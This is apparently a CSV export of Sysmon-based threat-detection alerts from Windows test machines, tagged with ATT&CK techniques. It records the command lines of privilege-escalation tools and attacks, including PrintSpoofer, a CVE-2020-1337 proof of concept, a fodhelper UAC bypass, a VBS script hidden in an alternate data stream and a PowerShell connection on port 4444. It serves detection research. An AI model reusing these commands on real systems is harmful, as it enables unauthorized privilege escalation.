365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4887 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:57.600 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6056-5D3F-0000-0010C9EF4100 + 4600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342417 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:08.141 + 747F3D96-E940-5F33-0000-001039310F00 + 7460 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-E93C-5F33-0000-0010A6F00E00 + 8032 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 8118 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.721 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + IEWIN7\IEUser + tcp + false + false + 10.0.2.13 + IEWIN7 + 4444 + + false + 10.0.2.18 + + 38208 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 196375 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-24 01:13:54.117 + 747F3D96-CA52-5EC9-0000-001027FA3700 + 4456 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-BDD1-5EC9-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-CA4E-5EC9-0000-00109FE23700 + 1516 + C:\Windows\System32\cmd.exe + c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5637 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 07:26:35.116 + 747F3D96-88AB-5D46-0000-001081ED7D03 + 4300 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-88AA-5D46-0000-001093E37D03 + 4644 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe") ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:57.417 + 747F3D96-B595-5EAD-0000-00106BFDC200 + 6004 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + "C:\Windows\system32\whoami.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( "C:\Windows\system32\whoami.exe" ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:57.417 + 747F3D96-B595-5EAD-0000-00106BFDC200 + 6004 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + "C:\Windows\system32\whoami.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342416 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:04.074 + 747F3D96-E93C-5F33-0000-0010A6F00E00 + 8032 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E93B-5F33-0000-001003BA0E00 + 7920 + C:\Windows\System32\wermgr.exe + C:\Windows\system32\wermgr.exe -upload + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11267 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 03:25:24.677 + 365ABB72-9DA4-5CD3-0000-00107F7A2F00 + 2920 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9DA4-5CD3-0000-00102E692F00 + 3184 + C:\Windows\System32\sdclt.exe + "C:\Windows\system32\sdclt.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11242 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:52:23.515 + 365ABB72-95E7-5CD3-0000-001004970F00 + 3784 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9570-5CD3-0000-00103FC90A00 + 1900 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4965 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.213 + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5277 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:14:08.401 + 747F3D96-5E70-5D45-0000-0010FCDD9D00 + 3656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-5E6F-5D45-0000-001014CA9D00 + 8180 + C:\Windows\System32\fodhelper.exe + "C:\Windows\system32\fodhelper.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.909 + 365ABB72-3ED4-5D0B-0000-0010B2871A00 + 1440 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "cmd" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5277 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:14:08.401 + 747F3D96-5E70-5D45-0000-0010FCDD9D00 + 3656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-5E6F-5D45-0000-001014CA9D00 + 8180 + C:\Windows\System32\fodhelper.exe + "C:\Windows\system32\fodhelper.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch > \\.\pipe\msdhch ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8575 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 07:46:15.183 + 365ABB72-FD47-5CC7-0000-00106AF61D00 + 4088 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c echo msdhch > \\.\pipe\msdhch + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-F6A1-5CC7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-F6A1-5CC7-0000-001004550000 + 468 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110434 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:54.866 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-B592-5EAD-0000-0010ECCBC200 + 6760 + C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe + PrintSpoofer.exe -i -c powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110434 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:54.866 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-B592-5EAD-0000-0010ECCBC200 + 6760 + C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe + PrintSpoofer.exe -i -c powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:45.193 + 747F3D96-292D-5E1E-0000-0010F5597D00 + 3828 + C:\Windows\explorer.exe + 10.0.17763.348 (WinBuild.160101.0800) + Windows Explorer + Microsoft® Windows® Operating System + Microsoft Corporation + EXPLORER.EXE + explorer ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-292D-5E1E-0000-0020CD587D00 + 0x7d58cd + 0 + High + SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:45.193 + 747F3D96-292D-5E1E-0000-0010F5597D00 + 3828 + C:\Windows\explorer.exe + 10.0.17763.348 (WinBuild.160101.0800) + Windows Explorer + Microsoft® Windows® Operating System + Microsoft Corporation + EXPLORER.EXE + explorer ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-292D-5E1E-0000-0020CD587D00 + 0x7d58cd + 0 + High + SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164892 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 20:43:58.450 + 00247C92-858E-5F7B-0000-0010E741202B + 6636 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\windows\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-858E-5F7B-0000-00105241202B + 18404 + C:\Windows\System32\Taskmgr.exe + C:\windows\system32\taskmgr.exe + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342414 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:03.484 + 747F3D96-E93B-5F33-0000-0010C1B40E00 + 7888 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243570 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:45.082 + 747F3D96-9F7D-5E75-0000-00104E062100 + 2484 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-9F77-5E75-0000-001090F32000 + 2416 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 196371 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 